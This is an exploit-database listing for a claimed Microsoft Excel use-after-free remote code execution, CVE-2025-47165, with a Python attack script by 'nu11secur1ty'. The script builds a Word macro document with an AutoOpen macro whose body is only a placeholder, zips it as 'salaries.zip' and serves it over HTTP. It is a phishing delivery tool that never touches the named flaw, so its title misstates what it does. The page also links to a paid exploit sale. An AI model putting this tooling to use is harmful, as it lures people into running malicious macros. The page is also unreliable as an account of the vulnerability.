Microsoft Excel 2024 Use after free – Remote Code Execution...

Exploit Details

Basic Information

Exploit Title	Microsoft Excel 2024 Use after free – Remote Code Execution (RCE)
Exploit ID	EDB-ID:52343
Type	exploitdb
Published	2025-06-26T00:00:00
Modified	2025-06-26T00:00:00

CVSS Information

CVSS Score	7.8
Severity	HIGH
Vector	CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE Information

CVE-2025-47165

Exploit Description

Exploit Title: Microsoft Excel…

Exploit Code

# Exploit Title: Microsoft Excel 2024 Use after free – Remote Code Execution (RCE)

# Author: nu11secur1ty

# Date: 06/24/2025

# Vendor: Microsoft

# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af

# Reference:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165

# CVE: CVE-2025-47165

# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021,

Microsoft 365 Apps for Enterprise
# Description:

The attacker can trick any user into opening and executing their code by

sending a malicious DOCM file via email or a streaming server. After the

execution of the victim, his machine can be infected or even worse than

ever; this could be the end of his Windows machine! WARNING: AMPOTATE THE

MACROS OPTIONS FROM YOUR OFFICE 365!!!
#!/usr/bin/python
import os

import sys

import pythoncom

from win32com.client import Dispatch

import http.server

import socketserver

import socket

import threading

import zipfile
PORT = 8000

DOCM_FILENAME = “salaries.docm”

ZIP_FILENAME = “salaries.zip”

DIRECTORY = “.”
def create_docm_with_macro(filename=DOCM_FILENAME):

    pythoncom.CoInitialize()

    word = Dispatch(“Word.Application”)

    word.Visible = False
    try:

        doc = word.Documents.Add()

        vb_project = doc.VBProject

        vb_component = vb_project.VBComponents(“ThisDocument”)
        macro_code = ”’

Sub AutoOpen()

      //YOUR EXPLOIT HERE

      // All OF YPU PLEASE WATCH THE DEMO VIDEO

      // Best Regards to packetstorm.news and OFFSEC

End Sub

”’
        vb_component.CodeModule.AddFromString(macro_code)
        doc.SaveAs(os.path.abspath(filename), FileFormat=13)

        print(f”[+] Macro-enabled Word document created: {filename}”)
    except Exception as e:

        print(f”[!] Error creating document: {e}”)

    finally:

        doc.Close(False)

        word.Quit()

        pythoncom.CoUninitialize()
def zip_docm(docm_path, zip_path):

    with zipfile.ZipFile(zip_path, ‘w’, compression=zipfile.ZIP_DEFLATED)

as zipf:

        zipf.write(docm_path, arcname=os.path.basename(docm_path))

    print(f”[+] Created ZIP archive: {zip_path}”)
def get_local_ip():

    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    try:

        s.connect((“8.8.8.8”, 80))

        ip = s.getsockname()[0]

    except Exception:

        ip = “127.0.0.1”

    finally:

        s.close()

    return ip
class Handler(http.server.SimpleHTTPRequestHandler):

    def __init__(self, *args, **kwargs):

        super().__init__(*args, directory=DIRECTORY, **kwargs)
def run_server():

    ip = get_local_ip()

    print(f”[+] Starting HTTP server on http://{ip}:{PORT}”)

    print(f”[+] Place your macro docm and zip files in this directory to

serve them.”)

    print(f”[+] Access the ZIP file at: http://{ip}:{PORT}/{ZIP_FILENAME}”)

    with socketserver.TCPServer((“”, PORT), Handler) as httpd:

        print(“[+] Server running, press Ctrl+C to stop”)

        httpd.serve_forever()
if __name__ == “__main__”:

    if os.name != “nt”:

        print(“[!] This script only runs on Windows with MS Word

installed.”)

        sys.exit(1)
    print(“[*] Creating the macro-enabled document…”)

    create_docm_with_macro(DOCM_FILENAME)
    print(“[*] Creating ZIP archive of the document…”)

    zip_docm(DOCM_FILENAME, ZIP_FILENAME)
    print(“[*] Starting HTTP server in background thread…”)

    server_thread = threading.Thread(target=run_server, daemon=True)

    server_thread.start()
    try:

        while True:

            pass  # Keep main thread alive

    except KeyboardInterrupt:

        print(“\n[!] Server stopped by user.”)
“`
# Reproduce:

[href](https://www.youtube.com/watch?v=CSb76-OG-Tg)
# Buy an exploit only:

[href](https://satoshidisk.com/pay/COiBVA)
# Time spent:

01:37:00
—

System Administrator – Infrastructure Engineer

Penetration Testing Engineer

Exploit developer at https://packetstormsecurity.com/

https://cve.mitre.org/index.html

https://cxsecurity.com/ and https://www.exploit-db.com/

0day Exploit DataBase https://0day.today/

home page: https://www.nu11secur1ty.com/

hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=

                          nu11secur1ty 
— 
System Administrator – Infrastructure Engineer

Penetration Testing Engineer

Exploit developer at https://packetstorm.news/

https://cve.mitre.org/index.html

https://cxsecurity.com/ and https://www.exploit-db.com/

0day Exploit DataBase https://0day.today/

home page: https://www.nu11secur1ty.com/

hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=

                          nu11secur1ty

View Full Exploit Details

Exploit Details

Basic Information

CVSS Information

CVE Information

Exploit Description

Exploit Code

💭 Join the Security Discussion ❌ Cancel Reply